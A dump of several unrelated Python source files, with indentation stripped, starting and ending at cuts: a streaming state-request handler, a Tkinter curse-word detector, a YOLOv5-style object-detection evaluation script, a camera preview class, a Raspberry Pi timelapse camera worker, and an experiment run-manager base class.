def process_instruction_id(self, bundle_id):
if getattr(self._context, 'process_instruction_id', None) is not None:
raise RuntimeError(
'Already bound to %r' % self._context.process_instruction_id)
self._context.process_instruction_id = bundle_id
try:
yield
finally:
self._context.process_instruction_id = None
def start(self):
self._done = False
def request_iter():
while True:
request = self._requests.get()
if request is self._DONE or self._done:
break
yield request
responses = self._state_stub.State(request_iter())
def pull_responses():
try:
for response in responses:
self._responses_by_id[response.id].set(response)
if self._done:
break
except: # pylint: disable=bare-except
self._exc_info = sys.exc_info()
raise
reader = threading.Thread(target=pull_responses, name='read_state')
reader.daemon = True
reader.start()
def done(self):
self._done = True
self._requests.put(self._DONE)
def blocking_get(self, state_key, continuation_token=None):
response = self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
get=beam_fn_api_pb2.StateGetRequest(
continuation_token=continuation_token)))
return response.get.data, response.get.continuation_token
def blocking_append(self, state_key, data):
self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
append=beam_fn_api_pb2.StateAppendRequest(data=data)))
def blocking_clear(self, state_key):
self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
clear=beam_fn_api_pb2.StateClearRequest()))
def _blocking_request(self, request):
request.id = self._next_id()
request.instruction_reference = self._context.process_instruction_id
self._responses_by_id[request.id] = future = _Future()
self._requests.put(request)
while not future.wait(timeout=1):
if self._exc_info:
t, v, tb = self._exc_info
raise_(t, v, tb)
elif self._done:
raise RuntimeError()
del self._responses_by_id[request.id]
response = future.get()
if response.error:
raise RuntimeError(response.error)
else:
return response
def _next_id(self):
self._last_id += 1
return str(self._last_id)
class _Future(object):
"""A simple future object to implement blocking requests.
"""
def __init__(self):
self._event = threading.Event()
def wait(self, timeout=None):
return self._event.wait(timeout)
def get(self, timeout=None):
if self.wait(timeout):
return self._value
else:
raise LookupError()
def set(self, value):
self._value = value
self._event.set()
|
censor.py | import tkinter as tk
from tkinter import *
from PIL import Image
from PIL import ImageTk
from datetime import date
import shortuuid
import multiprocessing
import time
### This Function is used to detect censor words ###
def censor(listOfWords):
listOfWords=listOfWords.split(",") ## This list contains dataset of curse words
#print(" ugly" in listOfWords)
li=[] # In this list we are putting the detected words so that there won't be any repetitions
filename = "Utils/CurseWordsDetected/detectedWords"+str(shortuuid.uuid())+".txt" #For unique name
while True:
f = open("Utils/tempFile.txt","r")
userInput=f.read()
userInput=userInput.replace(".", " ")
userInput=userInput.replace(",", " ")
userInput=userInput.replace("/", " ")
userInputList=userInput.split( )
#Removing fullstops and commas which can be problematic later
#userInput=userInput.split(" ")
#print(userInput)
# Traversing the dataset and checking if any match is found or not
for ele in listOfWords:
#for eleUserinp in userInput:
#print(eleUserinp,"INPUT") if str(ele).strip() in str(eleUserinp).strip():
if str(ele).strip() in str(userInput):
## Now match is found but there is possibility of false alert eg. in homework there is word ho, so it will be false positive so removing that
if len(str(ele).strip().split(" "))<2 and str(ele).strip() not in userInputList:
continue
#print("Less than 2",len(str(ele).strip().split(" ")))
#print("False Alert")
#else:
#print(len(str(ele).strip().split(" ")))
#pass
# Print on terminal detected word
print(ele,"detected")
# Save in text file
f = open(filename,"a+")
if ele not in li:
li.append(ele)
ele=ele+"\n"
f.write(ele)
time.sleep(1)
else:
#print(ele,userInput)
continue
## This function creates GUI for detector
def guiForCensor():
# This function is for saving written input by the user to the file after clicking save button
def saveToFile():
nameOfFile = 'Utils/InputFile/'+str(date.today())+str(shortuuid.uuid())+'.txt'
inputTextMatter=inputtxt.get(1.0,"end-1c")
f = open(nameOfFile, "w+")
f.write(str(inputTextMatter))
print(">> saveFunction")
# This is for backend purpose, we are saving file in temp so we can get it later
def printInput():
inputTextMatter=inputtxt.get(1.0,"end-1c")
f = open("Utils/tempFile.txt", "w+")
f.write(str(inputTextMatter))
frame.after(2000, printInput)
# Creating Frame
frame = tk.Tk()
frame.title("Censor Words")
frame.geometry('640x480')
# Setting Background and necessary components
bg="Images/bg.jpg"
image=Image.open(bg)
image = image.resize((640,480), Image.ANTIALIAS)
bg = ImageTk.PhotoImage(image)
bglabel=Label(frame,image=bg)
bglabel.place(x=0,y=0)
inputtxt = tk.Text(frame, height = 15,width = 50)
inputtxt.place(x=120,y=100)
heading = tk.Label(frame, text="Censor Words", font=("Gentium Basic", 25), bg='#255543', fg='#fff')
heading.place(x=220,y=50)
saveButton = tk.Button(frame,text="Save",command=saveToFile)
saveButton.place(x=315,y=400)
frame.after(2000, printInput)
frame.mainloop()
# opening dataset
f = open("Utils/censor_word_list.txt", "r")
listOfWords = f.read()
# Use of multiprocessing to run both functions at same time
p1 = multiprocessing.Process(target=censor,args=(listOfWords,))
p2 = multiprocessing.Process(target=guiForCensor)
if __name__ == "__main__":
p1.start()
p2.start()
#censor(listOfWords)
#guiForCensor()
|
test.py | import argparse
import json
import os
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
def test(data,
weights=None,
batch_size=32,
imgsz=640,
conf_thres=0.001,
iou_thres=0.6, # for NMS
save_json=False,
single_cls=False,
augment=False,
verbose=False,
model=None,
dataloader=None,
save_dir=Path(''), # for saving images
save_txt=False, # for auto-labelling
save_hybrid=False, # for hybrid auto-labelling
save_conf=False, # save auto-label confidences
plots=True,
log_imgs=0, # number of logged images
compute_loss=None):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
set_logging()
device = select_device(opt.device, batch_size=batch_size)
# Directories
save_dir = Path(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok)) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
gs = max(int(model.stride.max()), 32) # grid size (max stride)
imgsz = check_img_size(imgsz, s=gs) # check img_size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Half
half = device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
is_coco = data.endswith('coco.yaml') # is COCO dataset
with open(data) as f:
data = yaml.load(f, Loader=yaml.SafeLoader) # model dict
check_dataset(data) # check
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Logging
log_imgs, wandb = min(log_imgs, 100), None # ceil
try:
import wandb # Weights & Biases
except ImportError:
log_imgs = 0
# Dataloader
if not training:
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
path = data['test'] if opt.task == 'test' else data['val'] # path to val/test images
dataloader = create_dataloader(path, imgsz, batch_size, gs, opt, pad=0.5, rect=True,
prefix=colorstr('test: ' if opt.task == 'test' else 'val: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Targets', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
with torch.no_grad():
# Run model
t = time_synchronized()
out, train_out = model(img, augment=augment) # inference and training outputs
t0 += time_synchronized() - t
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1][:3] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_synchronized()
out = non_max_suppression(out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb, multi_label=True)
t1 += time_synchronized() - t
# Statistics per image
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if save_txt:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging
if plots and len(wandb_images) < log_imgs:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb.Image(img[si], boxes=boxes, caption=path.name))
# Append to pycocotools JSON dictionary
if save_json:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if plots:
confusion_matrix.process_batch(predn, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
# Plot images
if plots and batch_i < 3:
f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%12.3g' * 6 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb and wandb.run:
val_batches = [wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]
wandb.log({"Images": wandb_images, "Validation": val_batches}, commit=False)
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='test.py')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path')
parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch')
parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
parser.add_argument('--task', default='val', help="'val', 'test', 'study'")
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
parser.add_argument('--project', default='runs/test', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.data = check_file(opt.data) # check file
print(opt)
check_requirements()
if opt.task in ['val', 'test']: # run normally
test(opt.data,
opt.weights,
opt.batch_size,
opt.img_size,
opt.conf_thres,
opt.iou_thres,
opt.save_json,
opt.single_cls,
opt.augment,
opt.verbose,
save_txt=opt.save_txt | opt.save_hybrid,
save_hybrid=opt.save_hybrid,
save_conf=opt.save_conf,
)
elif opt.task == 'speed': # speed benchmarks
for w in opt.weights:
test(opt.data, w, opt.batch_size, opt.img_size, 0.25, 0.45, save_json=False, plots=False)
elif opt.task == 'study': # run over a range of settings and save/plot
# python test.py --task study --data coco.yaml --iou 0.7 --weights yolov5s.pt yolov5m.pt yolov5l.pt yolov5x.pt
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
print(f'\nRunning {f} point {i}...')
r, _, t = test(opt.data, w, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json,
plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(x=x) # plot
|
null_preview.py | import picamera2.picamera2
import threading
class NullPreview:
def thread_func(self, picam2):
import selectors
sel = selectors.DefaultSelector()
sel.register(picam2.camera_manager.efd, selectors.EVENT_READ, self.handle_request)
self.event.set()
while self.running:
events = sel.select(0.2)
for key, mask in events:
callback = key.data
callback(picam2)
def __init__(self, x=None, y=None, width=None, height=None):
# Ignore width and height as they are meaningless. We only accept them so as to
# be a drop-in replacement for the Qt/DRM previews.
self.size = (width, height)
self.event = threading.Event()
self.picam2 = None
def start(self, picam2):
self.picam2 = picam2
self.thread = threading.Thread(target=self.thread_func, args=(picam2,))
self.thread.setDaemon(True)
self.running = True
self.thread.start()
self.event.wait()
def set_overlay(self, overlay):
# This only exists so as to have the same interface as other preview windows.
pass
def handle_request(self, picam2):
completed_request = picam2.process_requests()
if completed_request:
completed_request.release()
def stop(self):
self.running = False
self.thread.join()
self.picam2 = None
|
camera_worker.py | """
This is (for instance) a Raspberry Pi only worker!
The libcamera project (in development), aims to offer an open source stack for
cameras for Linux, ChromeOS and Android.
It will be able to detect and manage all of the exposed camera on the system.
Connected via USB or CSI (Rasperry pi camera).
libcamera developers plan to privide Python bindings:
https://www.raspberrypi.org/blog/an-open-source-camera-stack-for-raspberry-pi-using-libcamera/#comment-1528789
Not available at time of writing: 9 Nov 2020
Once available, we should look forward migrating to this library, as it would
allow our worker to support multiple boards and devices.
"""
import datetime
import json
import os
import sys
import threading
import time
from picamera import PiCamera
from utils import get_config_item
from workers.linux.worker import Worker
from logger.Logger import Logger, LOG_LEVEL
class CameraWorker(Worker):
def __init__(self, config, main_thread_running, system_ready,
camera_available):
super().__init__(config, main_thread_running, system_ready)
self.pending_reset = False
# Events
self.camera_available = camera_available
# Dynamic Properties based on config
self.path = get_config_item(self.config, 'path', '/etc/mudpi/img/')
self.topic = get_config_item(
self.config, 'topic', 'mudpi/camera/', replace_char="/"
)
if self.config['resolution'] is not None:
self.resolutionX = int(self.config['resolution'].get('x', 1920))
self.resolutionY = int(self.config['resolution'].get('y', 1080))
if self.config['delay'] is not None:
self.hours = int(self.config['delay'].get('hours', 0))
self.minutes = int(self.config['delay'].get('minutes', 0))
self.seconds = int(self.config['delay'].get('seconds', 0))
self.init()
return
def init(self):
try:
self.camera = PiCamera(
resolution=(self.resolutionX, self.resolutionY))
# Below we calibrate the camera for consistent imaging
self.camera.framerate = 30
# Wait for the automatic gain control to settle
time.sleep(2)
# Now fix the values
self.camera.shutter_speed = self.camera.exposure_speed
self.camera.exposure_mode = 'off'
g = self.camera.awb_gains
self.camera.awb_mode = 'off'
self.camera.awb_gains = g
except Exception:
self.camera = PiCamera()
# Pubsub Listeners
self.pubsub = self.r.pubsub()
self.pubsub.subscribe(**{self.topic: self.handle_event})
Logger.log(
LOG_LEVEL["info"],
'Camera Worker...\t\t\t\033[1;32m Ready\033[0;0m'
)
return
def run(self):
thread = threading.Thread(target=self.work, args=())
thread.start()
self.listener = threading.Thread(target=self.listen, args=())
self.listener.start()
Logger.log(
LOG_LEVEL["info"],
'Camera Worker...\t\t\t\033[1;32m Online\033[0;0m'
)
return thread
def wait(self):
# Calculate the delay
try:
self.next_time = (datetime.datetime.now() + datetime.timedelta(
hours=self.hours, minutes=self.minutes,
seconds=self.seconds)).replace(microsecond=0)
except Exception:
# Default every hour
self.next_time = (
datetime.datetime.now() + datetime.timedelta(hours=1)
).replace(minute=0, second=0, microsecond=0)
delay = (self.next_time - datetime.datetime.now()).seconds
time.sleep(delay)
def handle_event(self, message):
data = message['data']
decoded_message = None
if data is not None:
try:
if isinstance(data, dict):
decoded_message = data
elif isinstance(data.decode('utf-8'), str):
temp = json.loads(data.decode('utf-8'))
decoded_message = temp
if decoded_message['event'] == 'Timelapse':
Logger.log(
LOG_LEVEL["info"],
"Camera Signaled for Reset"
)
self.camera_available.clear()
self.pending_reset = True
except Exception:
Logger.log(LOG_LEVEL["error"],
'Error Handling Event for Camera')
def listen(self):
while self.main_thread_running.is_set():
if self.system_ready.is_set():
if self.camera_available.is_set():
self.pubsub.get_message()
time.sleep(1)
else:
delay = (
self.next_time - datetime.datetime.now()
).seconds + 15
# wait 15 seconds after next scheduled picture
time.sleep(delay)
self.camera_available.set()
else:
time.sleep(2)
return
def work(self):
self.reset_elapsed_time()
while self.main_thread_running.is_set():
if self.system_ready.is_set():
if self.camera_available.is_set():
# try:
for i, filename in enumerate(
self.camera.capture_continuous(
self.path + 'mudpi-{counter:05d}.jpg')):
if not self.camera_available.is_set():
if self.pending_reset:
try:
# cleanup previous file
os.remove(
filename
)
self.pending_reset = False
except Exception:
Logger.log(
LOG_LEVEL["error"],
"Error During Camera Reset Cleanup"
)
break
message = {'event': 'StateChanged', 'data': filename}
self.r.set('last_camera_image', filename)
self.r.publish(self.topic, json.dumps(message))
Logger.log(
LOG_LEVEL["debug"],
'Image Captured \033[1;36m%s\033[0;0m' % filename
)
self.wait()
# except:
# print("Camera Worker \t\033[1;31m Unexpected Error\033[0;0m")
# time.sleep(30)
else:
time.sleep(1)
self.reset_elapsed_time()
else:
# System not ready camera should be off
time.sleep(1)
self.reset_elapsed_time()
time.sleep(0.1)
# This is only ran after the main thread is shut down
self.camera.close()
self.listener.join()
self.pubsub.close()
Logger.log(
LOG_LEVEL["info"],
"Camera Worker Shutting Down...\t\t\033[1;32m Complete\033[0;0m"
)
|
run_manager.py | import logging
import datetime
import os
import re
from collections import namedtuple
from threading import Lock, Thread, Event, current_thread, _MainThread
import sys
import functools
import traceback
import signal
import abc
from contextlib import contextmanager
from importlib import import_module
from inspect import getmembers, isclass, getargspec
from functools import partial
from ast import literal_eval
from time import time
from functools import wraps
from yaml import safe_load
from pybar.utils.utils import find_file_dir_up
punctuation = '!,.:;?'
_RunStatus = namedtuple('RunStatus', ['init', 'running', 'finished', 'stopped', 'aborted', 'crashed'])
run_status = _RunStatus(init='INIT', running='RUNNING', finished='FINISHED', stopped='STOPPED', aborted='ABORTED', crashed='CRASHED')
logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(name)s - [%(levelname)-8s] (%(threadName)-10s) %(message)s")
class RunAborted(Exception):
pass
class RunStopped(Exception):
pass
class RunBase(object):
'''Basic run meta class
Base class for run class.
'''
__metaclass__ = abc.ABCMeta
def __init__(self, conf):
'''Initialize object.
Parameters
----------
conf: dict
Persistant configuration for all runs.
run_conf : dict
Run configuration for single run.
'''
self._conf = conf
self._run_conf = None
self._run_number = None
self._run_status = run_status.init
self.file_lock = Lock()
self.stop_run = Event() # abort condition for loops
self.abort_run = Event()
self._run_start_time = None
self._run_stop_time = None
self._total_run_time = None
self._last_error_message = None
self._last_traceback = None
self._cancel_functions = None
self.connect_cancel(["abort"])
def __getattr__(self, name):
''' This is called in a last attempt to receive the value for an attribute that was not found in the usual places.
'''
try:
return self._run_conf[name] # Accessing run conf parameters
except (KeyError, TypeError): # If key is not existing or run conf is not a dict
raise AttributeError("'%s' has no attribute '%s'" % (self.__class__.__name__, name))
@property
def run_id(self):
'''Run name without whitespace
'''
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', self.__class__.__name__)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
@property
def conf(self):
'''Configuration (namedtuple)
'''
conf = namedtuple('conf', field_names=self._conf.keys())
return conf(**self._conf) # prevent changing dict
@property
def run_conf(self):
'''Run configuration (namedtuple)
'''
run_conf = namedtuple('run_conf', field_names=self._run_conf.keys())
return run_conf(**self._run_conf) # prevent changing dict
@abc.abstractproperty
def _default_run_conf(self):
'''Defining default run configuration (dictionary)
'''
pass
@property
def default_run_conf(self):
'''Default run configuration (namedtuple)
'''
default_run_conf = namedtuple('default_run_conf', field_names=self._default_run_conf.keys())
return default_run_conf(**self._default_run_conf) # prevent changing dict
@property
def working_dir(self):
return self._conf['working_dir']
@property
def run_number(self):
return self._run_number
@run_number.setter
def run_number(self, value):
raise AttributeError
@property
def run_status(self):
return self._run_status
@run_status.setter
def run_status(self, value):
raise AttributeError
def get_run_status(self):
return self._run_status
def run(self, run_conf, run_number=None, signal_handler=None):
self._init(run_conf, run_number)
logging.info('Starting run %d (%s) in %s', self.run_number, self.__class__.__name__, self.working_dir)
# set up signal handler
if isinstance(current_thread(), _MainThread):
logging.info('Press Ctrl-C to stop run')
if not signal_handler:
signal_handler = self._signal_handler
signal.signal(signal.SIGINT, signal_handler)
try:
with self._run():
self.do_run()
except RunAborted as e:
self._run_status = run_status.aborted
self._last_traceback = None
self._last_error_message = e.__class__.__name__ + ": " + str(e)
except Exception as e:
self._run_status = run_status.crashed
self._last_traceback = traceback.format_exc()
self._last_error_message = e.__class__.__name__ + ": " + str(e)
else:
self._run_status = run_status.finished
self._last_traceback = None
self._last_error_message = None
finally:
pass
# revert signal handler to default
if isinstance(current_thread(), _MainThread):
signal.signal(signal.SIGINT, signal.SIG_DFL)
self._cleanup()
# log message
if self.run_status == run_status.finished:
log_status = logging.INFO
else:
if self.run_status == run_status.stopped:
log_status = logging.INFO
elif self.run_status == run_status.aborted:
log_status = logging.WARNING
else:
log_status = logging.ERROR
logging.log(log_status, 'Run {} {}{}{}'.format(self.run_number, self.run_status, (': ' + str(self._last_error_message)) if self._last_error_message else '', ('\n' + self._last_traceback) if self._last_traceback else ''))
if self._last_traceback:
with open(os.path.join(self.working_dir, "crash" + ".log"), 'a+') as f:
f.write('-------------------- Run {} ({}) --------------------\n'.format(self.run_number, self.__class__.__name__))
traceback.print_exc(file=f)
f.write('\n')
logging.log(log_status, '{} run {} ({}) in {} (total time: {})'.format(self.run_status, self.run_number, self.__class__.__name__, self.working_dir, str(self._total_run_time)))
return self.run_status
def _init(self, run_conf, run_number=None):
'''Initialization before a new run.
'''
self.stop_run.clear()
self.abort_run.clear()
self._run_status = run_status.running
self._write_run_number(run_number)
self._init_run_conf(run_conf)
def _init_run_conf(self, run_conf):
attribute_names = [key for key in self._default_run_conf.keys() if (key in self.__dict__ or (hasattr(self.__class__, key) and isinstance(getattr(self.__class__, key), property)))]
if attribute_names:
raise RuntimeError('Attribute names already in use. Rename the following parameters in run conf: %s' % ', '.join(attribute_names))
sc = namedtuple('run_configuration', field_names=self._default_run_conf.keys())
default_run_conf = sc(**self._default_run_conf)
if run_conf:
self._run_conf = default_run_conf._replace(**run_conf)._asdict()
else:
self._run_conf = default_run_conf._asdict()
@contextmanager
def _run(self):
try:
self.pre_run()
yield
self.post_run()
if self.abort_run.is_set():
raise RunAborted()
finally:
self.cleanup_run()
@abc.abstractmethod
def pre_run(self):
'''Before run.
'''
pass
@abc.abstractmethod
def do_run(self):
'''The run.
'''
pass
@abc.abstractmethod
def post_run(self):
'''After run.
'''
pass
@abc.abstractmethod
def cleanup_run(self):
'''Cleanup after run, will be executed always, even after exception. Avoid throwing exceptions here.
'''
pass
def _cleanup(self):
'''Cleanup after a new run.
'''
self._write_run_status(self.run_status)
def connect_cancel(self, functions):
'''Run given functions when a run is cancelled.
'''
self._cancel_functions = []
for func in functions:
if isinstance(func, basestring) and hasattr(self, func) and callable(getattr(self, func)):
self._cancel_functions.append(getattr(self, func))
elif callable(func):
self._cancel_functions.append(func)
else:
raise ValueError("Unknown function %s" % str(func))
def handle_cancel(self, **kwargs):
'''Cancelling a run.
'''
for func in self._cancel_functions:
f_args = getargspec(func)[0]
f_kwargs = {key: kwargs[key] for key in f_args if key in kwargs}
func(**f_kwargs)
def stop(self, msg=None):
'''Stopping a run. Control for loops. Gentle stop/abort.
This event should provide a more gentle abort. The run should stop ASAP but the run is still considered complete.
'''
if not self.stop_run.is_set():
if msg:
logging.info('%s%s Stopping run...', msg, ('' if msg[-1] in punctuation else '.'))
else:
logging.info('Stopping run...')
self.stop_run.set()
def abort(self, msg=None):
'''Aborting a run. Control for loops. Immediate stop/abort.
The implementation should stop a run ASAP when this event is set. The run is considered incomplete.
'''
if not self.abort_run.is_set():
if msg:
logging.error('%s%s Aborting run...', msg, ('' if msg[-1] in punctuation else '.'))
else:
logging.error('Aborting run...')
self.abort_run.set()
self.stop_run.set() # set stop_run in case abort_run event is not used
def close(self):
'''Close properly and releasing hardware resources.
This should be called before Python garbage collector takes action.
'''
pass
def _get_run_numbers(self, status=None):
run_numbers = {}
with self.file_lock:
if not os.path.exists(self.working_dir):
os.makedirs(self.working_dir)
# In Python 2.x, open on all POSIX systems ultimately just depends on fopen.
with open(os.path.join(self.working_dir, "run" + ".cfg"), 'a+') as f:
f.seek(0)
for line in f.readlines():
try:
number_parts = re.findall('\d+\s+', line)
parts = re.split('\s+', line)
if status:
if parts[2] in status:
run_number = int(number_parts[0])
else:
continue
else:
run_number = int(number_parts[0])
